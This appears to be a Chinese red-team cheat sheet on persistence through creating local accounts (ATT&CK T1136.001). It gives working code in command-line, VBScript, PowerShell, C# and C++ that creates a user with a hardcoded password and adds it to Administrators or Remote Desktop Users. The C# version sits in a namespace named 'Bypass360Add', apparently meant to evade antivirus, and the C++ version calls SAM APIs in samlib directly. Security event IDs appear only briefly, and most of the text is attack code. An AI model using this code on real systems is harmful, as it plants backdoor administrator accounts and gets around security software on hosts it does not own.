新建用户

新建本地用户并将其加入 Administrators 与 Remote Desktop Users 组。以下各版本都必须以管理员权限运行；这是典型的本地账户持久化手法（ATT&CK T1136.001），在开启账户管理审核的主机上会产生安全日志 4720（账户创建）和 4732（加入本地安全组）事件。

命令行:

net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add

VBScript（WSH + ADSI WinNT 提供程序；原文误标为 Powershell）:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

PowerShell（另一版本，使用 Windows 10 / Server 2016 起自带的 LocalAccounts 模块）:

$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"

C#（通过 P/Invoke 调用 Netapi32 的 NetUserAdd / NetLocalGroupAddMembers）:

using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
    public static class BypassUAC_csharp
    {
        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);
        public static void Main(string[] args)
        {
            LocalGroupUserHelper local = new LocalGroupUserHelper();
            string username = "qwqdanchun";
            string password = "password";
            string groupname = "Administrators";
            local.AddUser(null, username, password, null);
            local.GroupAddMembers(null, groupname, username);
            ExitProcess(1);
        }
    }
    public class LocalGroupUserHelper
    {
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // //lgrmi3_domainandname
        }
       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age;
            public int usri1_priv;
            public string usri1_home_dir;
            public string comment;
            public int usri1_flags;
            public string usri1_script_path;
        }
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding User");
            }
        }
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}

C++（重写 AddUser：不经 Netapi32，直接通过 samlib.dll 的 SAM 客户端接口创建用户；注意此版本只创建账户，没有加入管理员组）:

#include "ApiAddUser.h"
#include <stdio.h>



int wmain(int argc, wchar_t* argv[])
{
    UNICODE_STRING UserName;
    UNICODE_STRING PassWord;
    HANDLE ServerHandle = NULL;
    HANDLE DomainHandle = NULL;
    HANDLE UserHandle = NULL;
    ULONG GrantedAccess;
    ULONG RelativeId;
    NTSTATUS Status = NULL;
    HMODULE hSamlib = NULL;
    HMODULE hNtdll = NULL;
    HMODULE hNetapi32 = NULL;
    LSA_HANDLE hPolicy = NULL;
    LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
    USER_ALL_INFORMATION uai = { 0 };


    hSamlib = LoadLibraryA("samlib.dll");
    hNtdll = LoadLibraryA("ntdll");

    pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
    pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
    pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
    pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
    pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
    pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    RtlInitUnicodeString(&UserName, L"Admin");
    RtlInitUnicodeString(&PassWord, L"Admin");

    Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
    Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
    Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);

    Status = SamOpenDomain(ServerHandle, 
        DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
        DomainInfo->DomainSid, 
        &DomainHandle);

    Status = SamCreateUser2InDomain(DomainHandle,
        &UserName,
        USER_NORMAL_ACCOUNT,
        USER_ALL_ACCESS | DELETE | WRITE_DAC,
        &UserHandle,&GrantedAccess,&RelativeId);

    RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
    uai.NtPasswordPresent = TRUE;
    uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;


    Status = SamSetInformationUser(UserHandle,
        UserAllInformation,
        &uai);

    return 0;
}
